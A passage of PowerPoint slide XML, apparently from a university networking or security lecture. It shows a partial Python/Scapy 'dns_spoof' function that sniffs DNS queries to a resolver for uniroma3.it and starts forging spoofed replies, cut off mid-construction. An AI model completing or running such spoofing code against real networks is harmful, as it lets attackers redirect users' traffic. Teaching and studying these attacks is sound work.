              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>DNS_UNI_IP = "110.0.0.10"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>INTERFACE = "eth0"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>TARGET_DOMAIN = "uniroma3.it"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>def</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dns_spoof</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>):</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt.haslayer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(DNSQR) and </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[DNS].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> == 0 and </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[IP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> == DNS_UNI_IP:        </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[DNSQR].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname.decode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>()</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>if</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> TARGET_DOMAIN in </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ether_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ether</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ether</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Ether</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = IP(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[IP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dst</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[IP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>udp_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = UDP(sport=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[UDP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[UDP].sport)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>            </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dns_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = DNS(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                id=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pkt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[DNS].id,</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11070368-062C-4EA3-B07D-E3804E0AFD0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="176" y="3327"/>
              <a:ext cx="1939" cy="50"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
